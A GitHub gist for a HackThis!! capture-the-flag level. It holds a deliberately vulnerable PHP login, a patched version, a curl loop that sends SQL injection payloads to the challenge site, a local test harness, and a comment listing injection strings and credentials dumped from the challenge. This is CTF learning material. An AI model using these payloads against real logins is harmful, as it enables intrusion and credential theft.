@evandrix
Last active December 10, 2015 19:08
<!DOCTYPE HTML>
<html lang = "en">
<head>
<title>HackThis!! - Capture the Flag</title>
<meta charset = "UTF-8" />
<link href='https://fonts.googleapis.com/css?family=Ubuntu|Orbitron' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="/ctf/css/main.css">
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
</head>
<body>
<div class='level_title'>
Level 7 </div>
<div class='nav'>
<a href='/ctf/leaderboard'>Leaderboard</a> | <a href='/ctf/irc'>IRC</a> | <a href='/'>Normal Site</a> | <a href='?logout'>Logout</a>
</div>
<div class='level_container'>
<form autocomplete="off" method="POST">
<input type="text" name="user" data-holder="Username"/><br/>
<input type="password" name="pass" data-holder="Password"/><br/>
<input type="submit" class="submit" value="Login"/>
</form>
<a href='#' class='view'>View Details</a>
</div>
<div class='level_code'>
<a href='#' class='close'>[X]</a>
<div class='code'>
<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">if&nbsp;(isset(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">])&nbsp;&amp;&amp;&nbsp;isset(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">]))&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$id&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">sqlite_escape_string</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">]);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$pass&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">sqlite_escape_string</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">]);<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"SELECT&nbsp;id,&nbsp;username&nbsp;FROM&nbsp;users<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WHERE&nbsp;password='</span><span style="color: #007700">{</span><span style="color: #0000BB">$pass</span><span style="color: #007700">}</span><span style="color: #DD0000">'&nbsp;AND&nbsp;id=</span><span style="color: #007700">{</span><span style="color: #0000BB">$id</span><span style="color: #007700">}</span><span 
style="color: #DD0000">&nbsp;LIMIT&nbsp;1"</span><span style="color: #007700">;<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$db</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">query</span><span style="color: #007700">(</span><span style="color: #0000BB">$query</span><span style="color: #007700">))&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$db</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">fetch</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"SELECT&nbsp;id,&nbsp;level&nbsp;FROM&nbsp;priv&nbsp;WHERE&nbsp;id&nbsp;=&nbsp;'</span><span style="color: #007700">{</span><span style="color: #0000BB">$id</span><span style="color: #007700">}</span><span style="color: #DD0000">'<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AND&nbsp;level&nbsp;&gt;&nbsp;0&nbsp;LIMIT&nbsp;1"</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$result2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$db</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">query</span><span style="color: #007700">(</span><span style="color: #0000BB">$query</span><span style="color: #007700">);<br 
/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">$result2&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$result2</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">numRows</span><span style="color: #007700">()&nbsp;&gt;&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$admin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;else&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$admin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">}&nbsp;else&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">}<br />&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br /></span><span style="color: #0000BB">?&gt;<br /></span>
</span>
</code> </div>
</div>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-34026704-2']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<script src="/ctf/js/main.js"></script>
</body>
</html>
<?php
    // ...

    if (isset($_POST['user']) && isset($_POST['pass'])) {
        // sqlite_escape_string() only doubles single quotes. That protects a value
        // placed inside '...' but does nothing for $id, which is interpolated
        // unquoted into a numeric comparison below.
        $id = sqlite_escape_string($_POST['user']);
        $pass = sqlite_escape_string($_POST['pass']);

        $query = "SELECT id, username FROM users
                  WHERE password='{$pass}' AND id={$id} LIMIT 1";

        // Note: this condition only checks that the query ran, not that it
        // returned a row.
        if ($result = $db->query($query)) {
            $user = $db->fetch();
            // ...
            // The raw request value is reused here instead of the id that was
            // actually authenticated.
            $query = "SELECT id, level FROM priv WHERE id = '{$id}'
                      AND level > 0 LIMIT 1";
            $result2 = $db->query($query);
            if ($result2 && $result2->numRows() > 0) {
                $admin = true;
            } else {
                $admin = false;
            }
            // ...
        } else {
            // ...
        }
    }
?>
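The same login flow with the injection closed, as an added example that is not the challenge's or the gist author's code. It assumes PDO with the sqlite driver, the challenge's `users` and `priv` tables, and `users.password` holding `password_hash()` output rather than plaintext.

```php
<?php
// Added example, not the challenge's or the gist author's code: the level-7
// login with the injection closed. Assumes a PDO handle and the challenge's
// users/priv tables, with users.password storing password_hash() output.
function authenticate(PDO $db, string $user, string $pass): ?array
{
    // The challenge interpolates $id unquoted ("AND id={$id}"), so an escaping
    // function that only doubles single quotes cannot help there. Refuse
    // anything that is not a plain integer before any SQL is built.
    if (!ctype_digit($user)) {
        return null;
    }
    $id = (int) $user;

    // Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT id, username, password FROM users WHERE id = :id LIMIT 1');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // A query that succeeds with zero rows is not a login; the original's
    // "if ($result = $db->query(...))" only tests that the query ran.
    if ($row === false || !password_verify($pass, $row['password'])) {
        return null;
    }
    unset($row['password']);

    // Privilege lookup keyed on the authenticated id, never on raw input.
    $stmt = $db->prepare('SELECT 1 FROM priv WHERE id = :id AND level > 0 LIMIT 1');
    $stmt->execute([':id' => $row['id']]);
    $row['admin'] = ($stmt->fetchColumn() !== false);
    return $row;
}

// Stand-alone demo against an in-memory SQLite database with constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec('CREATE TABLE priv (id INTEGER, level INTEGER)');
$ins = $db->prepare('INSERT INTO users VALUES (:id, :name, :hash)');
$ins->execute([':id' => 1000, ':name' => 'alice', ':hash' => password_hash('correct-horse', PASSWORD_DEFAULT)]);
$ins->execute([':id' => 1006, ':name' => 'bob',   ':hash' => password_hash('battery', PASSWORD_DEFAULT)]);
$db->exec('INSERT INTO priv VALUES (1006, 1)');

var_dump(authenticate($db, '1000', 'correct-horse'));    // alice, admin => false
var_dump(authenticate($db, '1006', 'wrong'));            // NULL
var_dump(authenticate($db, '1000 or id=1006--', "''")); // NULL, rejected before any SQL runs
```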
for i in $(seq 1000 1006); do
    MSG=$(curl -s -b cookies.txt -d "user=$i or id=$i" -d "pass=''" http://www.hackthis.co.uk/ctf/7 | egrep -i "(invalid|not|completed)")
    echo "$i:$MSG"
done
<?php
// Local reproduction harness for the level-7 query logic against a MySQL "test"
// database. It relies on the legacy mysql_* extension and on sqlite_escape_string(),
// both removed from current PHP; to run it today swap in mysqli/PDO and
// str_replace("'", "''", $s) for the escaping call.
//
// curl -d "user=***" -d "pass=***" -c cookies.txt http://www.hackthis.co.uk/ctf/
// curl -s -b cookies.txt -d "user=$i" -d "pass='secret'" http://www.hackthis.co.uk/ctf/7
$user = $argv[1];
$pass = '';//$argv[2];
$db = mysql_connect("127.0.0.1", "root", "");
if (!$db) {
    die('Could not connect: ' . mysql_error());
}
mysql_select_db("test", $db);
if (isset($user) && isset($pass)) {
    $id = sqlite_escape_string($user);
    $pass = sqlite_escape_string($pass);
    echo $id . "#" . $pass . "\n";
    // Same query as the challenge: $id lands unquoted in a numeric comparison.
    $query = "SELECT id, username FROM users
              WHERE password='{$pass}' AND id={$id} LIMIT 1";
    echo $query . "\n";
    $result = mysql_query($query);
    while ($row = mysql_fetch_array($result)) {
        print_r($row);
        $query = "SELECT id, level FROM priv WHERE id = '{$id}'
                  AND level > 0 LIMIT 1";
        echo $query . "\n";
        // Separate handle so the loop keeps iterating the users result,
        // not the priv result.
        $result2 = mysql_query($query);
        $row2 = mysql_fetch_array($result2);
        print_r($row2);
    }
    exit();
    /*
    if ($result = $db->mysql_query($query)) {
        $user = $db->fetch();
        $query = "SELECT id, level FROM priv WHERE id = '{$id}'
                  AND level > 0 LIMIT 1";
        $result2 = $db->query($query);
        if ($result2 && $result2->numRows() > 0) {
            $admin = true;
            echo "admin = true";
        } else {
            $admin = false;
            echo "admin = false";
        }
    } else {
    }
    */
}
mysql_close($db);
?>
@evandrix

evandrix commented Jan 8, 2013

id
1 or id=1006--
password
1 union select id,password as username from users where id=1006--

1000: walsh / pass
1001: blunden / meow
1002: AJulie / Ware21£Rsd
1003: bew8re / ;oog£!!
1004: overlord / lovelove
1005: sheperd / b00b1es
1006: user / asdfg

username field: userid, i.e. 1005
password field: password, i.e. b00b1es

@prisonbreak

Hi evandrix,

Which is the correct username/password for level 7?
